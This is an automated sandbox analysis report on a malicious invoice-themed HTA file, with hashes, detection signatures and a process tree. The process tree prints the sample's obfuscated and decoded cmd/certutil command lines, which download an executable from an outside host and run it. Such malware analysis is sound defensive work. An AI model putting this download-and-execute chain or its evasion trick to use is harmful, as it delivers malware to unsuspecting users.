Analysis
max time kernel: 117s
max time network: 120s
platform: windows7_x64
resource: win7-20230831-en
resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
submitted: 25-09-2023 10:02
Static task: static1
Behavioral task: behavioral1
  Sample: mkhg_Overdue_payment.hta
  Resource: win7-20230831-en (windows7-x64)
  4 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: mkhg_Overdue_payment.hta
  Resource: win10v2004-20230915-en (windows10-2004-x64)
  19 signatures, 150 seconds
General
Target: mkhg_Overdue_payment.hta
Size: 9KB
MD5: b9dfe024b3df498c61441d3f2f1bb498
SHA1: 1d12bec3e863aa225f7be5008598dd953e23dc05
SHA256: 3996b5a66262b9cf59b38a399d0467dae23a4044ddf26da24aa292659f3c0803
SHA512: 833887996411ab1614f9cb750ad8516eaf223c8af8db0919f75a3d05a8460c5a925fa62193f8c447cbcc5073252300d3d9dd2c56a295f9a198433f566a398a65
SSDEEP: 24:vVPaQJWpXy7RZnHDACVYxdNAbaCs58ms1e5XTldVbZiNMG:TJCy7R1ydNAbaHXtZG
Score: 5/10
Malware Config
Signatures
An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoC)
  Processes: cmd.exe (PID 2432)
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Modifies Internet Explorer settings (1 IoC)
  Processes:
    description: Key created
    ioc: \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main
    process: mshta.exe
Suspicious use of WriteProcessMemory (16 IoCs)
  Processes (each pair was recorded four times, 16 entries in total):
    PID 2420 mshta.exe wrote to memory of PID 2432 cmd.exe
    PID 2432 cmd.exe wrote to memory of PID 744 cmd.exe
    PID 2432 cmd.exe wrote to memory of PID 2996 cmd.exe
    PID 744 cmd.exe wrote to memory of PID 1876 certutil.exe
Processes
1. C:\Windows\SysWOW64\mshta.exe (PID 2420)
   Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mkhg_Overdue_payment.hta"
   - Modifies Internet Explorer settings
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe (PID 2432)
      Command line: "C:\Windows\system32\cmd.exe" "/c Cmd /C ^s^T^a^R^t^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^b^ ^ ^ ^/^m^I^n^ ^ ^ ^c^e^R^T^U^T^I^L^.^e^x^E^ ^ ^ ^ ^-^U^r^L^c^a^c^H^e^ ^ ^ ^ ^ ^ ^-^S^P^L^i^t^ ^ ^ ^ ^ ^-^F^ ^ ^ ^ ^ ^ ^ ^h^t^t^p^s^:^/^/^v^o^i^l^a^r^a^p^e^.^o^n^l^i^n^e^/^i^n^v^o^i^c^e^/^d^o^c^d^a^d^2^0^2^3^0^9^2^5^.^e^x^e^ ^ C:\Users\Admin\AppData\Roaming\TestPutty.exe | CMd.exE /sTarT /b /MiN pInG.Exe & start C:\Users\Admin\AppData\Roaming\TestPutty.exe"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\cmd.exe (PID 744)
         Command line: Cmd /C sTaRt /b /mIn ceRTUTIL.exE -UrLcacHe -SPLit -F https://voilarape.online/invoice/docdad20230925.exe C:\Users\Admin\AppData\Roaming\TestPutty.exe
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\certutil.exe (PID 1876)
            Command line: ceRTUTIL.exE -UrLcacHe -SPLit -F https://voilarape.online/invoice/docdad20230925.exe C:\Users\Admin\AppData\Roaming\TestPutty.exe
      3. C:\Windows\SysWOW64\cmd.exe (PID 2996)
         Command line: CMd.exE /sTarT /b /MiN pInG.Exe